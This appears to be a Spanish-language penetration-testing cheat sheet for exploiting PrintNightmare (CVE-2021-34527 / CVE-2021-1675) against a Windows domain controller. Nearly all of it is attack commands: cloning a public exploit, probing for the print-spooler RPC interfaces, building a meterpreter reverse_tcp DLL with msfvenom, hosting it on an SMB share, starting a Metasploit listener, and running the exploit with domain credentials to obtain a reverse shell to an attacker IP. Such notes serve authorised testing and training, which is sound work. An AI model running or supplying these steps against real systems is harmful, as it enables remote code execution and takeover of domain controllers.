PrintNightmare

CVE-2021-34527 / CVE-2021-1675

1) Clonación de repositorio.

git clone https://github.com/cube0x0/CVE-2021-1675.git

Revisión si el objetivo es vulnerable.

  • Print System Asynchronous Protocol.

  • Print System Remote Protocol.

rpcdump.py @<IP-address-DC> | egrep 'MS-PAR|MS-RPRN'

2) Generación de payload DLL.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker-IP-address> LPORT=<listen-local-port> -f dll > script.dll

3) Creación de recurso compartido.

smbserver.py -smb2support share script.dll

4) Configuración de listener (multi/handler) de reverse shell.

msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <attacker-IP-address>
set LPORT <listen-local-port>
run -j

5) Ejecución de exploit y obtención de reverse shell.

CVE-2021-1675.py <ACME.LOCAL>/<user>:<password>@<IP-address-DC> '\\<attacker-IP-address>\share\script.dll'

Última actualización